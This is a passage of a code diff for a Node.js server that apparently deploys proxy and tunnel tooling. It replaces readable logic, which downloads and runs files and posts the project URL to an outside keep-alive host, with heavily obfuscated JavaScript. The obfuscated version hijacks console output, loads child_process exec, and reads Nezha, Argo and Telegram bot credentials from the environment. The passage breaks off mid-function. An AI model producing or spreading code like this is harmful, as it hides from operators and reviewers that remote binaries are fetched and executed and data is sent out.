- headers: { 'Content-Type': 'application/json' } - }); - if (response.status === 200) { - console.log('Subscription uploaded successfully'); - } else { - return null; - } - } catch (error) { - return null; - } - } else { - return; - } -} - -// 自动访问项目URL -async function AddVisitTask() { - if (!AUTO_ACCESS || !PROJECT_URL) { - console.log("Skipping adding automatic access task"); - return; - } - - try { - const response = await axios.post('https://keep.gvrander.eu.org/add-url', { - url: PROJECT_URL - }, { - headers: { - 'Content-Type': 'application/json' - } - }); - console.log('automatic access task added successfully'); - } catch (error) { - console.error(`添加URL失败: ${error.message}`); - } -} - -// 运行服务 -async function startserver() { - deleteNodes(); - cleanupOldFiles(); - argoType(); - await downloadFilesAndRun(); - AddVisitTask(); - cleanFiles(); -} -startserver(); - -app.listen(PORT, () => console.log(`server is running on port:${PORT}!`)); +(function(_0x7ffdeb,_0x15b2db){const _0x2d6957={_0x4a7b75:0x48,_0x22bdae:0x6d,_0x47e525:0x93,_0x263bf7:0x9b,_0x2fc13b:0x69,_0x2020c6:0xc8,_0xc4f974:0x59,_0x3b5118:0x19c,_0x58ae1c:0x12f,_0x4e9f18:0xdc,_0x2b0c81:0x1a,_0x284f4f:0x3,_0xafc5e5:0x109,_0x4b7a8c:0x14b,_0x2b9590:0x15b,_0x4f1224:0x1ab,_0x417604:0x28d,_0x154e94:0x85,_0x4e3724:0xd2,_0x41cc5e:0x149,_0x539b55:0x2a6,_0x66cfb1:0x1a5,_0x374733:0x31,_0x409644:0x148,_0x394e91:0x35,_0x4f24ce:0x232,_0x435e7d:0xcf},_0x3c10c7={_0x43afcf:0x31e},_0x320256={_0x4e4530:0x27e};function _0x3bfcba(_0x2bb064,_0x163900,_0x4b7fff,_0x2baca1){return _0x325c(_0x163900- -_0x320256._0x4e4530,_0x4b7fff);}const _0x1e3b08=_0x7ffdeb();function _0x1e2299(_0x23aa79,_0x2e1086,_0x5789e3,_0x5e77e4){return _0x325c(_0x23aa79- -_0x3c10c7._0x43afcf,_0x2e1086);}while(!![]){try{const _0x5a0501=parseInt(_0x3bfcba(_0x2d6957._0x4a7b75,-_0x2d6957._0x22bdae,-_0x2d6957._0x47e525,0x26))/(0x1*0x53b+-0x32b*-0xa+-0x8*0x49d)*(-parseInt(_0x3bfcba(_0x2d6957._0x263bf7,_0x2d6957._0x2fc13b,-_0x2d6957._0x2020c6,0x7d))/(0x712+-0xe40+-0x14*-0x5c))+parseInt(_0x3bfcba(0x1c3,_0x2d6957._0xc4f974,0x19d,0xf2))/(-0x8*-0x2e7+-0x248b+0x6*0x239)+parseInt(_0x1e2299(-_0x2d6957._0x3b5118,-0x134,-_0x2d6957._0x58ae1c,-0xba))/(0x43*0x1b+0x2649+-0xe*0x33d)+parseInt(_0x3bfcba(_0x2d6957._0x4e9f18,-_0x2d6957._0x2b0c81,_0x2d6957._0x284f4f,_0x2d6957._0xafc5e5))/(-0x1*-0x1c7f+0x26c8+0x4342*-0x1)+parseInt(_0x3bfcba(0xc9,0xce,_0x2d6957._0x4b7a8c,_0x2d6957._0x2b9590))/(0x3*-0xc5+0x12*-0x13+0x3ab)*(parseInt(_0x1e2299(-0x1dd,-_0x2d6957._0x4f1224,-0xfb,-_0x2d6957._0x417604))/(0x7c0+0xa*0x1da+-0x1*0x1a3d))+-parseInt(_0x3bfcba(0xaa,0xd1,-_0x2d6957._0x154e94,_0x2d6957._0x4e3724))/(-0x424*0x6+0x1bf5+-0x315)*(parseInt(_0x1e2299(-_0x2d6957._0x41cc5e,-_0x2d6957._0x539b55,-0x79,-_0x2d6957._0x66cfb1))/(-0x2ab+-0xc77+0xf2b))+-parseInt(_0x1e2299(-_0x2d6957._0x374733,-0xec,-_0x2d6957._0x284f4f,-_0x2d6957._0x409644))/(-0x9c6+0x221c+0x4*-0x613)*(parseInt(_0x3bfcba(_0x2d6957._0x394e91,0x11e,_0x2d6957._0x4f24ce,_0x2d6957._0x435e7d))/(0x647*0x1+-0x938+0xbf*0x4));if(_0x5a0501===_0x15b2db)break;else _0x1e3b08['push'](_0x1e3b08['shift']());}catch(_0x17692f){_0x1e3b08['push'](_0x1e3b08['shift']());}}}(_0x14e5,-0x18ef*0x4e+0x95519+0x3af0c));const _0x1f1fdf=(function(){const _0x4ef99d={_0x11d004:0x65f,_0x2e001e:0x3ad},_0xf59a7c={_0x336236:0x4a5,_0x2a888f:0x2cc,_0x470476:0x3c1,_0x48a908:0x29c},_0x396b01={_0x453bfc:0x284};function _0x52c709(_0x2ac8fb,_0x4e0b41,_0x5a1685,_0x5924cc){return _0x325c(_0x5a1685-_0x396b01._0x453bfc,_0x4e0b41);}const _0x25c8b9={};_0x25c8b9[_0x52c709(_0x4ef99d._0x11d004,0x59f,0x511,_0x4ef99d._0x2e001e)]=function(_0x31b22c,_0x3bc980){return _0x31b22c===_0x3bc980;};const _0x463ed0=_0x25c8b9;let _0x5128d4=!![];return function(_0x5b2eac,_0x226763){const _0xa9d7dd={_0x5ead71:0x154,_0xb0cbe3:0x140},_0x225f5c={_0x445a2d:0x3dd,_0x176fc0:0x44b,_0x9faf5e:0x497,_0x17970c:0x3ea,_0xa604b3:0x53c,_0x1a3ced:0x502,_0x327a9b:0x57e,_0x224734:0x4a7,_0x479cd3:0x453,_0x16695d:0x3c4,_0x1bcdff:0x48c},_0x395362={_0x3e5dfe:0x56,_0x57f329:0x4d,_0x5e8742:0x13c},_0x2b8729={_0x5ae05f:0x14d,_0x48fb5c:0x4e,_0x13adfc:0xd6},_0xe5d0dc={'bDqpa':function(_0x1c0a8a,_0x3baebe){const _0x44b4e4={_0x1e307f:0x271};function _0x1660e3(_0x35ea13,_0x3fb3f0,_0x5d455a,_0x40de30){return _0x325c(_0x40de30- -_0x44b4e4._0x1e307f,_0x5d455a);}return _0x463ed0[_0x1660e3(_0x2b8729._0x5ae05f,_0x2b8729._0x48fb5c,_0x2b8729._0x13adfc,0x1c)](_0x1c0a8a,_0x3baebe);},'ztPLD':_0x37d829(_0xf59a7c._0x336236,_0xf59a7c._0x2a888f,_0xf59a7c._0x470476,_0xf59a7c._0x48a908)},_0xff99bf=_0x5128d4?function(){const _0x11614e={_0x48658c:0x1b2,_0x5f2615:0xfb,_0x3c43ba:0xc1};function _0x57939f(_0x57f7d9,_0x171073,_0x35d9db,_0xdeba51){return _0x37d829(_0x35d9db,_0x171073-_0x11614e._0x48658c,_0xdeba51-_0x11614e._0x5f2615,_0xdeba51-_0x11614e._0x3c43ba);}function _0x311b16(_0x3ce47c,_0x19c666,_0x1fb761,_0x247945){return _0x37d829(_0x19c666,_0x19c666-_0x395362._0x3e5dfe,_0x1fb761-_0x395362._0x57f329,_0x247945-_0x395362._0x5e8742);}if(_0xe5d0dc[_0x311b16(_0x225f5c._0x445a2d,_0x225f5c._0x176fc0,_0x225f5c._0x9faf5e,_0x225f5c._0x17970c)](_0xe5d0dc['ztPLD'],_0xe5d0dc[_0x57939f(0x42f,_0x225f5c._0xa604b3,_0x225f5c._0x1a3ced,_0x225f5c._0x327a9b)])){if(_0x226763){const _0x537f17=_0x226763[_0x57939f(_0x225f5c._0x224734,_0x225f5c._0x479cd3,_0x225f5c._0x16695d,_0x225f5c._0x1bcdff)](_0x5b2eac,arguments);return _0x226763=null,_0x537f17;}}else _0x422888=_0x47e1ef;}:function(){};function _0x37d829(_0x2f2d57,_0x4f95fd,_0x368c5c,_0x58d10c){return _0x52c709(_0x2f2d57-0xc1,_0x2f2d57,_0x368c5c- -_0xa9d7dd._0x5ead71,_0x58d10c-_0xa9d7dd._0xb0cbe3);}return _0x5128d4=![],_0xff99bf;};}()),_0x423c22=_0x1f1fdf(this,function(){const _0x41d864={_0x11ac84:0x505,_0x201532:0x514,_0x240d02:0x74f,_0x2f1aad:0x13e,_0x4d4030:0x37,_0x5aa565:0x155,_0x5e4229:0x4f3,_0x588fc5:0x5b9,_0x288d60:0x4ed,_0x4e8e15:0xd3,_0x66762e:0x204,_0x26c260:0x154,_0x4807c7:0x155,_0x40f7c4:0x61e,_0x3db40c:0x62f,_0xa46beb:0x757},_0x305129={_0x335b79:0x363},_0x2381bc={};_0x2381bc['sQqxn']=_0x426e40(_0x41d864._0x11ac84,_0x41d864._0x201532,0x63e,_0x41d864._0x240d02);const _0x1098fc=_0x2381bc;function _0x426e40(_0x1e5333,_0x4f8959,_0x2a10bf,_0x458555){return _0x325c(_0x2a10bf-0x2ed,_0x4f8959);}function _0x370995(_0x536f9d,_0x34d6b5,_0x306f00,_0x4a5f5c){return _0x325c(_0x4a5f5c- -_0x305129._0x335b79,_0x34d6b5);}return _0x423c22['toString']()[_0x370995(-_0x41d864._0x2f1aad,-0x1c4,-_0x41d864._0x4d4030,-_0x41d864._0x5aa565)]('(((.+)+)+)+$')[_0x426e40(0x5d2,_0x41d864._0x5e4229,_0x41d864._0x588fc5,_0x41d864._0x288d60)]()['constructor'](_0x423c22)[_0x370995(-_0x41d864._0x4e8e15,-_0x41d864._0x66762e,-_0x41d864._0x26c260,-_0x41d864._0x4807c7)](_0x1098fc[_0x426e40(_0x41d864._0x40f7c4,0x748,_0x41d864._0x3db40c,_0x41d864._0xa46beb)]);});_0x423c22();const _0x330f01=(function(){const _0x4ad007={_0x14259b:0x124,_0x201468:0x2d6},_0x63e398={_0x2cd762:0x35f},_0x56b7f6={};_0x56b7f6['pduWO']=function(_0x4a5125,_0x2b1124){return _0x4a5125===_0x2b1124;};function _0x2a5612(_0x331dbc,_0x315dea,_0x22d289,_0x8ad2b8){return _0x325c(_0x8ad2b8- -_0x63e398._0x2cd762,_0x22d289);}_0x56b7f6[_0x2a5612(-0x140,-_0x4ad007._0x14259b,-_0x4ad007._0x201468,-0x21f)]='QUpNm';const _0x5da0a2=_0x56b7f6;let _0x12e8bb=!![];return function(_0x5c6c7d,_0x516c4d){const _0x204b07={_0xe9851d:0x101,_0x4b732d:0x139,_0x598d87:0x169,_0x1739de:0x3f1,_0x4f238a:0x2b7,_0x1237de:0x4b0,_0x11e6d6:0x39e,_0x197706:0x2ae,_0x4ed6ad:0x266,_0x236aba:0x10,_0x4fcbc5:0x15b,_0x3845d1:0x1ec,_0x26cfda:0x184,_0x475782:0x1c2},_0xcc16e=_0x12e8bb?function(){const _0x135085={_0x576fd3:0x1b},_0x3752b8={_0x51c210:0x4c};function _0x3e13a1(_0x171440,_0x6f54a3,_0x3c5bcc,_0x289119){return _0x325c(_0x6f54a3- -_0x3752b8._0x51c210,_0x3c5bcc);}function _0xc4a0f4(_0x593fbe,_0x59d46f,_0x20c051,_0x421b82){return _0x325c(_0x421b82-_0x135085._0x576fd3,_0x59d46f);}if(_0x516c4d){if(_0x5da0a2[_0x3e13a1(_0x204b07._0xe9851d,_0x204b07._0x4b732d,0x1fa,_0x204b07._0x598d87)](_0xc4a0f4(_0x204b07._0x1739de,_0x204b07._0x4f238a,_0x204b07._0x1237de,_0x204b07._0x11e6d6),_0x5da0a2[_0xc4a0f4(_0x204b07._0x197706,_0x204b07._0x4ed6ad,_0x204b07._0x236aba,_0x204b07._0x4fcbc5)]))return null;else{const _0x206dc0=_0x516c4d[_0x3e13a1(_0x204b07._0x3845d1,0x215,_0x204b07._0x26cfda,_0x204b07._0x475782)](_0x5c6c7d,arguments);return _0x516c4d=null,_0x206dc0;}}}:function(){};return _0x12e8bb=![],_0xcc16e;};}()),_0x3ac73d=_0x330f01(this,function(){const _0x4acb0a={_0x1edf78:0x55f,_0x18a87f:0x11e,_0x24942d:0x8d,_0x4e47ef:0x14f,_0x2c4e92:0xa,_0x3e5719:0x193,_0x1b9102:0x10a,_0x4c2557:0x222,_0x1d81c4:0x2f0,_0x2445b6:0x277,_0x57f0e1:0x74,_0x746f3c:0x1b,_0x46b125:0x119,_0x212d05:0x34,_0x5e9c87:0xf2,_0x1f13db:0x1a2,_0x16d915:0x61,_0x22c317:0x156,_0x2bdef4:0x386,_0x265713:0x635,_0x36be27:0x4c6,_0xb0acd2:0xad,_0x3294b1:0x13,_0xde4d31:0x170,_0x4b4a9b:0x2b2,_0x595e4e:0x178,_0x276da3:0x621,_0x4f7987:0x593,_0x385e6c:0x754,_0x19f188:0x6c7,_0x3666c0:0x67b,_0xec50c7:0x3d,_0x567d92:0x12a,_0x3c011e:0x226,_0x304873:0x232,_0x51061f:0x283,_0x57c0b3:0x49,_0x34db07:0x65,_0x5788ed:0xb6,_0x432b9f:0x1d1,_0x3b1371:0x1ec,_0x44f391:0x229,_0x21230d:0x487,_0x178cca:0x4ae,_0x240223:0x78c,_0x58bf2f:0x852,_0x861b7:0x7b2,_0x5ccafa:0x733,_0x4a9b61:0xbc,_0xff3478:0xba,_0x2d7d07:0x138,_0x313c3a:0x126,_0x7442f7:0x10b,_0x41eacf:0x6a8,_0x5171c5:0x6b1,_0x49d03d:0x697,_0x2ad85d:0x6fd,_0x4180a6:0x67b,_0x652195:0x6af,_0x5f20b9:0x6ad,_0x57ebb2:0x5e0,_0x4ff256:0x25,_0x1f8590:0x83,_0x4f6a6d:0x6a,_0x1f2e58:0x169,_0x3276da:0x1f5,_0x7c12aa:0x507,_0xa9303c:0x4e7,_0x27892f:0x610,_0x3be519:0x5db,_0x3bf0bf:0x67e,_0x4d2f27:0x49c,_0x43ba3d:0x55c,_0x1bcf96:0x5b7,_0x5592dd:0xed,_0x134ae0:0x161,_0x254b0a:0x14c,_0x2cff0a:0x27b,_0x27ddf3:0x68,_0x311b6a:0x84,_0x426722:0xfa,_0x359277:0x249},_0x18da03={_0x31e796:0x2ee,_0x4ed880:0x171,_0x272090:0x46,_0x5a8ecd:0x173,_0x3f25d6:0x2c3,_0x4cc134:0x234,_0x393a43:0x2b0,_0x3887fa:0x25a,_0x477d4c:0x129,_0x44ec22:0x16f,_0x3f3867:0x62,_0x2a34ef:0x18c,_0x3c5c89:0x103,_0x36519c:0x1,_0x37745b:0x5b,_0xa4eb6e:0xe0,_0xda2459:0xb6,_0x58eda9:0x1c5,_0x166876:0x48,_0x99a689:0xa,_0x509d9c:0x13f,_0x3d3388:0x217,_0x4a8e94:0x1b7,_0x581751:0x1dc,_0x41eb2a:0x12d,_0x5782c8:0x174,_0xae1378:0x228,_0x2ca18f:0x11b,_0x3d1a45:0x1fd,_0xf8c4b4:0xa1,_0x4192f4:0x68,_0x2a0d66:0x13a,_0x242f9e:0x206,_0x1576a7:0x2c1,_0x3ad8fd:0xf9,_0x40ef16:0x15f,_0x37cb36:0x249,_0x4b8dc5:0x3b,_0x545c0b:0x1b2,_0x155a89:0x11b,_0x44052e:0x1ef,_0x547cce:0x263,_0x341109:0x159,_0x37b335:0x336,_0x3aeffd:0x12a,_0x277e28:0x17b,_0x1facc7:0x289,_0x15f093:0x1ca,_0x5c8ce0:0xfc},_0x1927b5={_0x19ef6c:0x6b,_0x1772be:0x8e,_0x3b7c65:0x1e4},_0x57546e={_0x556a6f:0x350},_0x21131f={_0x13f13d:0x358},_0x55e999={};_0x55e999['lXnTl']=_0x21f52e(0x618,0x65e,0x4bc,_0x4acb0a._0x1edf78);function _0x21f52e(_0x286e13,_0x3cf5d2,_0x116b28,_0x260675){return _0x325c(_0x260675-_0x21131f._0x13f13d,_0x3cf5d2);}_0x55e999[_0x3a7891(-_0x4acb0a._0x18a87f,-_0x4acb0a._0x24942d,-_0x4acb0a._0x4e47ef,-_0x4acb0a._0x2c4e92)]='arm',_0x55e999[_0x3a7891(-_0x4acb0a._0x3e5719,-_0x4acb0a._0x1b9102,-_0x4acb0a._0x4c2557,-0xb8)]=_0x3a7891(-_0x4acb0a._0x1d81c4,-_0x4acb0a._0x2445b6,-0x1c4,-_0x4acb0a._0x57f0e1),_0x55e999[_0x3a7891(_0x4acb0a._0x746f3c,-_0x4acb0a._0x46b125,_0x4acb0a._0x212d05,0x3b)]=_0x3a7891(_0x4acb0a._0x5e9c87,_0x4acb0a._0x1f13db,_0x4acb0a._0x16d915,_0x4acb0a._0x22c317),_0x55e999['wlUkq']=function(_0x3dcf90,_0x13aac7){return _0x3dcf90===_0x13aac7;},_0x55e999['LjAyz']=_0x21f52e(_0x4acb0a._0x2bdef4,0x50d,_0x4acb0a._0x265713,_0x4acb0a._0x36be27),_0x55e999[_0x3a7891(-_0x4acb0a._0xb0acd2,-_0x4acb0a._0x746f3c,-_0x4acb0a._0x3294b1,-_0x4acb0a._0xde4d31)]=function(_0x434c6c,_0x5830f6){return _0x434c6c+_0x5830f6;},_0x55e999[_0x3a7891(-_0x4acb0a._0x4b4a9b,-0x18c,-_0x4acb0a._0x595e4e,-0x2db)]=function(_0x4d0ee6,_0xe3d4f8){return _0x4d0ee6+_0xe3d4f8;},_0x55e999[_0x21f52e(_0x4acb0a._0x276da3,0x708,0x546,_0x4acb0a._0x4f7987)]=_0x21f52e(_0x4acb0a._0x385e6c,_0x4acb0a._0x19f188,0x69f,_0x4acb0a._0x3666c0),_0x55e999['hkpZg']=function(_0x4efc05,_0x58af72){return _0x4efc05!==_0x58af72;},_0x55e999[_0x3a7891(-_0x4acb0a._0xec50c7,-0x9f,-_0x4acb0a._0x1b9102,-_0x4acb0a._0x567d92)]='tLpGY',_0x55e999[_0x3a7891(-0x196,-_0x4acb0a._0x3c011e,-_0x4acb0a._0x304873,-_0x4acb0a._0x51061f)]='info',_0x55e999[_0x3a7891(-_0x4acb0a._0x57c0b3,-_0x4acb0a._0x34db07,-0x165,-_0x4acb0a._0x5788ed)]='error',_0x55e999[_0x3a7891(-_0x4acb0a._0x432b9f,-_0x4acb0a._0x3b1371,-_0x4acb0a._0x44f391,-0x266)]=_0x21f52e(_0x4acb0a._0x21230d,0x5eb,_0x4acb0a._0x178cca,0x526),_0x55e999['YRfwC']=_0x21f52e(_0x4acb0a._0x240223,_0x4acb0a._0x58bf2f,_0x4acb0a._0x861b7,_0x4acb0a._0x5ccafa);function _0x3a7891(_0x5a973c,_0x942079,_0x176628,_0x588506){return _0x325c(_0x176628- -_0x57546e._0x556a6f,_0x5a973c);}_0x55e999[_0x3a7891(-_0x4acb0a._0x4a9b61,_0x4acb0a._0xff3478,0x5e,0xee)]=_0x3a7891(-0x1df,-_0x4acb0a._0x2d7d07,-_0x4acb0a._0x313c3a,-_0x4acb0a._0x7442f7);const _0x423745=_0x55e999,_0x3b614b=function(){const _0x57a1d1={_0x242511:0x179,_0x4cf736:0x58};function _0x28312e(_0x45730f,_0x344dca,_0x4732a9,_0x10c1a1){return _0x3a7891(_0x4732a9,_0x344dca-_0x1927b5._0x19ef6c,_0x344dca- -_0x1927b5._0x1772be,_0x10c1a1-_0x1927b5._0x3b7c65);}function _0xa660bb(_0x1aec60,_0x58dcb4,_0x10163b,_0x30ec40){return _0x3a7891(_0x10163b,_0x58dcb4-_0x57a1d1._0x242511,_0x58dcb4-0x150,_0x30ec40-_0x57a1d1._0x4cf736);}if('KELvV'!=='KELvV'){_0x8ca83a[_0xa660bb(0x173,0x17b,_0x18da03._0x31e796,_0x18da03._0x4ed880)](_0x423745[_0x28312e(-_0x18da03._0x272090,-_0x18da03._0x5a8ecd,-_0x18da03._0x3f25d6,-_0x18da03._0x4cc134)]);return;}else{let _0x63b294;try{if(_0x423745['wlUkq'](_0x28312e(-_0x18da03._0x393a43,-_0x18da03._0x3887fa,-0x2f2,-_0x18da03._0x477d4c),_0x423745[_0x28312e(-_0x18da03._0x44ec22,-_0x18da03._0x3f3867,-_0x18da03._0x2a34ef,-_0x18da03._0x3c5c89)])){const _0x18ce1c=_0x4936cc===_0x423745[_0xa660bb(-0x17,_0x18da03._0x36519c,_0x18da03._0x37745b,-_0x18da03._0xa4eb6e)]?_0x423745['WwBuj']:_0x423745['CBwhY'],_0x86fa8d={};_0x86fa8d[_0x28312e(-0x27a,-0x19d,-_0x18da03._0xda2459,-_0x18da03._0x58eda9)]=_0x28312e(-0x16f,-_0x18da03._0x166876,_0x18da03._0x99a689,-_0x18da03._0x509d9c),_0x86fa8d[_0x28312e(-_0x18da03._0x3d3388,-_0x18da03._0x4a8e94,-0x29b,-_0x18da03._0x581751)]=_0x18ce1c,_0x3d5651[_0x28312e(-_0x18da03._0x41eb2a,-_0x18da03._0x5782c8,-_0x18da03._0xae1378,-_0x18da03._0x2ca18f)](_0x86fa8d);}else _0x63b294=Function(_0x423745[_0x28312e(-_0x18da03._0x3d1a45,-_0x18da03._0xf8c4b4,-0x90,-_0x18da03._0x4192f4)](_0x423745[_0x28312e(-_0x18da03._0x2a0d66,-_0x18da03._0x242f9e,-_0x18da03._0x1576a7,-_0x18da03._0xf8c4b4)](_0xa660bb(-0x6,_0x18da03._0x3ad8fd,_0x18da03._0x40ef16,_0x18da03._0x37cb36),_0x423745[_0xa660bb(0x110,_0x18da03._0x4b8dc5,_0x18da03._0x545c0b,_0x18da03._0x155a89)]),');'))();}catch(_0x1319fc){_0x423745[_0x28312e(-_0x18da03._0x44052e,-_0x18da03._0x547cce,-_0x18da03._0x341109,-_0x18da03._0x37b335)](_0x423745[_0x28312e(-0xf4,-0x198,-_0x18da03._0x3aeffd,-0x12a)],_0x423745['nDsji'])?_0x5886b6[_0xa660bb(0x23f,_0x18da03._0x277e28,_0x18da03._0x1facc7,0xb0)](_0x5b3265+_0xa660bb(0x2f3,_0x18da03._0x15f093,_0x18da03._0x5c8ce0,0x23e)):_0x63b294=window;}return _0x63b294;}},_0xab281e=_0x3b614b(),_0xa5eb1=_0xab281e['console']=_0xab281e[_0x21f52e(0x7f1,_0x4acb0a._0x41eacf,0x782,_0x4acb0a._0x5171c5)]||{},_0x5223ad=['log',_0x21f52e(_0x4acb0a._0x49d03d,_0x4acb0a._0x2ad85d,_0x4acb0a._0x4180a6,_0x4acb0a._0x652195),_0x423745['tUsgV'],_0x423745[_0x21f52e(_0x4acb0a._0x3666c0,_0x4acb0a._0x5f20b9,_0x4acb0a._0x57ebb2,0x543)],_0x423745['yNUtS'],_0x423745[_0x3a7891(-_0x4acb0a._0x4ff256,-_0x4acb0a._0x1f8590,-0x117,-_0x4acb0a._0x4f6a6d)],_0x423745['mCesS']];for(let _0xba387d=0x2a5*0xe+-0xf53+-0x15b3;_0xba387d<_0x5223ad[_0x3a7891(-0x15c,-0x1e0,-_0x4acb0a._0x1f2e58,-_0x4acb0a._0x3276da)];_0xba387d++){const _0x1498e8=_0x330f01[_0x21f52e(0x3e5,_0x4acb0a._0x7c12aa,0x518,_0x4acb0a._0xa9303c)][_0x21f52e(_0x4acb0a._0x27892f,0x5aa,0x6ee,_0x4acb0a._0x3be519)][_0x21f52e(_0x4acb0a._0x3bf0bf,0x5c6,_0x4acb0a._0x4d2f27,_0x4acb0a._0x43ba3d)](_0x330f01),_0x10e8ea=_0x5223ad[_0xba387d],_0x44af6f=_0xa5eb1[_0x10e8ea]||_0x1498e8;_0x1498e8[_0x21f52e(0x6f5,_0x4acb0a._0x1bcf96,0x620,0x5ab)]=_0x330f01[_0x3a7891(-_0x4acb0a._0x5592dd,-_0x4acb0a._0x134ae0,-_0x4acb0a._0x254b0a,-_0x4acb0a._0x2cff0a)](_0x330f01),_0x1498e8['toString']=_0x44af6f[_0x3a7891(_0x4acb0a._0x27ddf3,-0x19f,-_0x4acb0a._0x311b6a,-0xd5)][_0x3a7891(-_0x4acb0a._0x426722,-_0x4acb0a._0x359277,-0x14c,-0x101)](_0x44af6f),_0xa5eb1[_0x10e8ea]=_0x1498e8;}});_0x3ac73d();const express=require('express'),app=express(),axios=require(_0x33ccd3(0x461,0x58d,0x6a1,0x5f1)),os=require('os'),fs=require('fs'),path=require('path'),{promisify}=require('util'),exec=promisify(require('child_process')[_0xe14257(-0xda,-0x261,-0x22d,-0x207)]),{execSync}=require(_0xe14257(-0x204,-0x11c,0x65,-0x8e)),UPLOAD_URL=process[_0x33ccd3(0x832,0x752,0x821,0x786)][_0xe14257(0x1f,0x22,-0xe5,-0x9)]||'',PROJECT_URL=process[_0xe14257(-0x119,-0x1f,0xd3,0x2a)][_0x33ccd3(0x7c8,0x781,0x7f7,0x8ab)]||'',AUTO_ACCESS=process['env']['AUTO_ACCESS']||![],YT_WARPOUT=process['env'][_0x33ccd3(0x7d8,0x6ee,0x7fe,0x72b)]||![],FILE_PATH=process['env'][_0xe14257(-0x16c,-0x226,-0x30c,-0x203)]||_0x33ccd3(0x788,0x738,0x5e8,0x819),SUB_PATH=process['env'][_0xe14257(-0x52,-0x50,0xb2,0x7d)]||_0xe14257(-0xfd,-0x1f4,-0x5a,-0x144),UUID=process['env'][_0x33ccd3(0x65d,0x6cc,0x779,0x6e7)]||_0xe14257(-0x142,0x98,-0x17f,-0x85),NEZHA_SERVER=process[_0x33ccd3(0x851,0x752,0x721,0x857)][_0x33ccd3(0x6d3,0x776,0x6f0,0x8d5)]||'',NEZHA_PORT=process[_0x33ccd3(0x72c,0x752,0x851,0x758)]['NEZHA_PORT']||'',NEZHA_KEY=process[_0xe14257(0x14c,0x131,-0x5d,0x2a)][_0x33ccd3(0x4ef,0x62e,0x6f3,0x69c)]||'',ARGO_DOMAIN=process[_0xe14257(-0x142,-0x6a,-0x9d,0x2a)][_0x33ccd3(0x39b,0x4e3,0x652,0x408)]||_0x33ccd3(0x4b8,0x61a,0x6ca,0x559),ARGO_AUTH=process[_0xe14257(0x10e,0x16f,-0x3a,0x2a)][_0xe14257(0x126,0x3f,-0x53,0x4d)]||_0xe14257(0x5c,0x18,-0x8a,-0x21),ARGO_PORT=process[_0xe14257(0x17e,0x1a,0x119,0x2a)][_0xe14257(-0x294,-0x186,-0x23e,-0x1d9)]||-0x2*0x301+0x14fa+0xb*0x17b,TUIC_PORT=process[_0x33ccd3(0x884,0x752,0x625,0x720)][_0x33ccd3(0x666,0x58c,0x6ad,0x587)]||'',HY2_PORT=process[_0x33ccd3(0x6f8,0x752,0x6b8,0x69f)][_0xe14257(-0x276,-0x18b,-0x95,-0x165)]||'',REALITY_PORT=process['env'][_0xe14257(0xe6,0x6f,0x9a,-0x61)]||'',CFIP=process[_0x33ccd3(0x654,0x752,0x6f5,0x899)][_0x33ccd3(0x655,0x670,0x729,0x642)]||_0x33ccd3(0x5aa,0x5f8,0x665,0x4b5),CFPORT=process[_0x33ccd3(0x6f3,0x752,0x6f5,0x6d1)][_0x33ccd3(0x59b,0x5c5,0x6a3,0x52d)]||-0x1987+-0x29*-0xe3+-0x919,PORT=process[_0xe14257(-0x2,0x24,-0xf5,0x2a)][_0xe14257(0x95,-0x1a3,-0x6b,-0x9b)]||0x1893+-0x12c0+-0x3*-0x1f7,NAME=process[_0x33ccd3(0x666,0x752,0x7df,0x5f6)]['NAME']||_0x33ccd3(0x583,0x6f0,0x5ce,0x5b0),CHAT_ID=process['env'][_0xe14257(-0x37f,-0xdc,-0x212,-0x21f)]||'',BOT_TOKEN=process['env'][_0x33ccd3(0x782,0x7c9,0x666,0x84d)]||'';!fs[_0x33ccd3(0x833,0x7cc,0x8c0,0x7a2)](FILE_PATH)?(fs[_0xe14257(-0x1db,-0x29,-0x19,-0x78)](FILE_PATH),console['log'](FILE_PATH+_0x33ccd3(0x7d5,0x75a,0x87e,0x630))):console['log'](FILE_PATH+'\x20already\x20exists');let privateKey='',publicKey='';function generateRandomName(){const _0x302cc3={_0x34551d:0x86,_0x3b9732:0xf7,_0x4f01b3:0x183,_0xe5e5a1:0x66,_0x473d70:0x9d,_0xa57783:0x3a,_0x501d0c:0xed,_0x22f5f6:0xaf,_0x3326be:0x1a7,_0x3cec4d:0x442,_0x1938b3:0x33c,_0x5736fb:0x226,_0x4c91e4:0x3d8,_0xbdd4f3:0x2a1,_0x57c54e:0x12e,_0x3741db:0x210,_0xec5dd8:0x170,_0x37774e:0x435,_0xb5124d:0x2a4,_0x43d438:0x338,_0x54987e:0x32a,_0x37b270:0x391,_0x4706f1:0x353,_0x569e8f:0x550,_0x5bb6a7:0x3f7,_0x4e904b:0x516,_0x2fe000:0x29a,_0x59455a:0x1c1,_0x5f3e7b:0x21b,_0x52450d:0x2d7,_0x71763e:0x263,_0x3937e5:0x160,_0x2820ed:0x1af,_0x4ff915:0xd,_0x406f83:0x199,_0x14d5b5:0x75,_0x2a5c51:0xf6,_0x22c54f:0x21f},_0x4c2f69={_0xeff02f:0x1ac},_0x27f88f={_0x20c309:0x1a6,_0x1f8f1e:0x44},_0x23d078={'Tzfau':_0x1f04e1(-_0x302cc3._0x34551d,-_0x302cc3._0x3b9732,-_0x302cc3._0x4f01b3,-_0x302cc3._0xe5e5a1),'tCidx':_0x1f04e1(-_0x302cc3._0x473d70,-0x3e,_0x302cc3._0xa57783,_0x302cc3._0x501d0c),'PpeQH':_0x1f04e1(0x41,_0x302cc3._0x22f5f6,0x2b,_0x302cc3._0x3326be),'YuZRq':function(_0x3be73e){return _0x3be73e();},'bRQxo':function(_0x25f67b,_0xd6f0d1,_0x14b6f0){return _0x25f67b(_0xd6f0d1,_0x14b6f0);},'NLHva':_0x11deae(0x235,_0x302cc3._0x3cec4d,_0x302cc3._0x1938b3,0x2d7),'VxPLM':function(_0xe8f8f5,_0x2f1059){return _0xe8f8f5<_0x2f1059;},'QncfZ':function(_0x297357,_0x3081c1){return _0x297357===_0x3081c1;},'uBAmP':_0x11deae(_0x302cc3._0x5736fb,_0x302cc3._0x4c91e4,0x391,_0x302cc3._0xbdd4f3),'cExUy':function(_0x26f14d,_0x5350f7){return _0x26f14d*_0x5350f7;}},_0x43f550=_0x23d078[_0x1f04e1(-_0x302cc3._0x57c54e,-_0x302cc3._0x3741db,-0x1bb,-_0x302cc3._0xec5dd8)];function _0x11deae(_0x175f08,_0x41411f,_0x64c3aa,_0x1d63b9){return _0xe14257(_0x175f08-_0x27f88f._0x20c309,_0x41411f-_0x27f88f._0x1f8f1e,_0x1d63b9,_0x64c3aa-0x37b);}function _0x1f04e1(_0x377857,_0x4b1154,_0x3ec01e,_0x4f771e){return 